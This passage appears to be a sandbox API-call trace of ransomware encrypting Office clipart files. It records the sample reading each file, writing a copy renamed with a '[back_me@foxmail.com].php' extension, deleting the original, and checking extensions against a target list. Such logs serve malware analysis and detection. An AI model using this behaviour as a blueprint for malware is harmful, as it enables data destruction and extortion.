hTemplateFile=0x0) returned 0x38c [0263.256] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=13204) returned 1 [0263.256] CloseHandle (hObject=0x38c) returned 1 [0263.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf")) returned 0x20 [0263.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0263.257] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.257] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0263.257] GetLastError () returned 0x0 [0263.257] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x3394, lpOverlapped=0x0) returned 1 [0263.259] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x33a0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x33a0, lpOverlapped=0x0) returned 1 [0263.260] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.260] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.260] SetEndOfFile (hFile=0x37c) returned 1 [0263.260] CloseHandle (hObject=0x37c) returned 1 [0263.260] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.261] SetEndOfFile (hFile=0x38c) returned 1 [0263.263] CloseHandle (hObject=0x38c) returned 1 [0263.263] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.263] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf")) returned 1 [0263.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.263] lstrlenW (lpString=".doc") returned 4 [0263.263] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.263] lstrlenW (lpString=".docx") returned 5 [0263.263] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0263.263] lstrlenW (lpString=".pdf") returned 4 [0263.263] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.263] lstrlenW (lpString=".xls") returned 4 [0263.263] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.263] lstrlenW (lpString=".xlsx") returned 5 [0263.263] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0263.264] lstrlenW (lpString=".ppt") returned 4 [0263.264] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.264] lstrlenW (lpString=".zip") returned 4 [0263.264] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.264] lstrlenW (lpString=".rar") returned 4 [0263.264] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.264] lstrlenW (lpString=".bz2") returned 4 [0263.264] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.264] lstrlenW (lpString=".7z") returned 3 [0263.264] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.264] lstrlenW (lpString=".dbf") returned 4 [0263.264] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.264] lstrlenW (lpString=".1cd") returned 4 [0263.264] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.264] lstrlenW (lpString=".jpg") returned 4 [0263.264] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.264] lstrlenW (lpString=".doc") returned 4 [0263.264] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.264] lstrlenW (lpString=".docx") returned 5 [0263.264] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0263.264] lstrlenW (lpString=".pdf") returned 4 [0263.264] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.264] lstrlenW (lpString=".xls") returned 4 [0263.264] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.264] lstrlenW (lpString=".xlsx") returned 5 [0263.264] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0263.264] lstrlenW (lpString=".ppt") returned 4 [0263.265] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.265] lstrlenW (lpString=".zip") returned 4 [0263.265] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.265] lstrlenW (lpString=".rar") returned 4 [0263.265] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.265] lstrlenW (lpString=".bz2") returned 4 [0263.265] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.265] lstrlenW (lpString=".7z") returned 3 [0263.265] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.265] lstrlenW (lpString=".dbf") returned 4 [0263.265] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.265] lstrlenW (lpString=".1cd") returned 4 [0263.265] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63 [0263.265] lstrlenW (lpString=".jpg") returned 4 [0263.265] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.265] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.265] lstrlenW (lpString="J0151073.WMF") returned 12 [0263.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0263.266] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=13336) returned 1 [0263.266] CloseHandle (hObject=0x38c) returned 1 [0263.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf")) returned 0x20 [0263.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0263.266] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.266] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0263.267] GetLastError () returned 0x0 [0263.267] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x3418, lpOverlapped=0x0) returned 1 [0263.268] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x3420, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x3420, lpOverlapped=0x0) returned 1 [0263.269] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.269] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.269] SetEndOfFile (hFile=0x37c) returned 1 [0263.269] CloseHandle (hObject=0x37c) returned 1 [0263.269] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.269] SetEndOfFile (hFile=0x38c) returned 1 [0263.271] CloseHandle (hObject=0x38c) returned 1 [0263.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.272] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf")) returned 1 [0263.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.272] lstrlenW (lpString=".doc") returned 4 [0263.272] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.272] lstrlenW (lpString=".docx") returned 5 [0263.272] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0263.272] lstrlenW (lpString=".pdf") returned 4 [0263.272] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.272] lstrlenW (lpString=".xls") returned 4 [0263.272] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.272] lstrlenW (lpString=".xlsx") returned 5 [0263.272] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0263.272] lstrlenW (lpString=".ppt") returned 4 [0263.272] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.272] lstrlenW (lpString=".zip") returned 4 [0263.272] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.273] lstrlenW (lpString=".rar") returned 4 [0263.273] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.273] lstrlenW (lpString=".bz2") returned 4 [0263.273] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.273] lstrlenW (lpString=".7z") returned 3 [0263.273] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.273] lstrlenW (lpString=".dbf") returned 4 [0263.273] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.273] lstrlenW (lpString=".1cd") returned 4 [0263.273] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.273] lstrlenW (lpString=".jpg") returned 4 [0263.273] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.273] lstrlenW (lpString=".doc") returned 4 [0263.273] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.273] lstrlenW (lpString=".docx") returned 5 [0263.273] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0263.273] lstrlenW (lpString=".pdf") returned 4 [0263.273] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.273] lstrlenW (lpString=".xls") returned 4 [0263.273] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.273] lstrlenW (lpString=".xlsx") returned 5 [0263.273] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0263.273] lstrlenW (lpString=".ppt") returned 4 [0263.273] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.273] lstrlenW (lpString=".zip") returned 4 [0263.273] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.273] lstrlenW (lpString=".rar") returned 4 [0263.274] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.274] lstrlenW (lpString=".bz2") returned 4 [0263.274] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.274] lstrlenW (lpString=".7z") returned 3 [0263.274] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.274] lstrlenW (lpString=".dbf") returned 4 [0263.274] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.274] lstrlenW (lpString=".1cd") returned 4 [0263.274] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63 [0263.274] lstrlenW (lpString=".jpg") returned 4 [0263.274] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.274] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.274] lstrlenW (lpString="J0151581.WMF") returned 12 [0263.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0263.275] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=10752) returned 1 [0263.275] CloseHandle (hObject=0x38c) returned 1 [0263.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf")) returned 0x20 [0263.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0263.275] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.275] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0263.276] GetLastError () returned 0x0 [0263.276] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x2a00, lpOverlapped=0x0) returned 1 [0263.277] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x2a10, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x2a10, lpOverlapped=0x0) returned 1 [0263.278] ReadFile (in: hFile=0x38c, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0263.278] WriteFile (in: hFile=0x37c, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0263.278] SetEndOfFile (hFile=0x37c) returned 1 [0263.278] CloseHandle (hObject=0x37c) returned 1 [0263.278] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0263.278] SetEndOfFile (hFile=0x38c) returned 1 [0263.280] CloseHandle (hObject=0x38c) returned 1 [0263.280] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0263.281] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf")) returned 1 [0263.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.281] lstrlenW (lpString=".doc") returned 4 [0263.281] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.281] lstrlenW (lpString=".docx") returned 5 [0263.281] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0263.281] lstrlenW (lpString=".pdf") returned 4 [0263.281] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.281] lstrlenW (lpString=".xls") returned 4 [0263.281] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.281] lstrlenW (lpString=".xlsx") returned 5 [0263.281] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0263.281] lstrlenW (lpString=".ppt") returned 4 [0263.281] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.281] lstrlenW (lpString=".zip") returned 4 [0263.282] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.282] lstrlenW (lpString=".rar") returned 4 [0263.282] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.282] lstrlenW (lpString=".bz2") returned 4 [0263.282] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.282] lstrlenW (lpString=".7z") returned 3 [0263.282] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.282] lstrlenW (lpString=".dbf") returned 4 [0263.282] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.282] lstrlenW (lpString=".1cd") returned 4 [0263.282] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.282] lstrlenW (lpString=".jpg") returned 4 [0263.282] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.282] lstrlenW (lpString=".doc") returned 4 [0263.282] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0263.282] lstrlenW (lpString=".docx") returned 5 [0263.282] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0263.282] lstrlenW (lpString=".pdf") returned 4 [0263.282] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0263.282] lstrlenW (lpString=".xls") returned 4 [0263.282] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0263.282] lstrlenW (lpString=".xlsx") returned 5 [0263.282] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0263.282] lstrlenW (lpString=".ppt") returned 4 [0263.282] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0263.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.282] lstrlenW (lpString=".zip") returned 4 [0263.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0263.283] lstrlenW (lpString=".rar") returned 4 [0263.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0263.283] lstrlenW (lpString=".bz2") returned 4 [0263.283] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0263.283] lstrlenW (lpString=".7z") returned 3 [0263.283] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0263.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.283] lstrlenW (lpString=".dbf") returned 4 [0263.283] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0263.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.283] lstrlenW (lpString=".1cd") returned 4 [0263.283] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0263.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63 [0263.283] lstrlenW (lpString=".jpg") returned 4 [0263.283] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0263.283] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0263.283] lstrlenW (lpString="J0152414.WMF") returned 12 [0263.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0263.283] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=24844) returned 1 [0263.283] CloseHandle (hObject=0x38c) returned 1 [0263.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf")) returned 0x20 [0263.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0263.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0263.284] 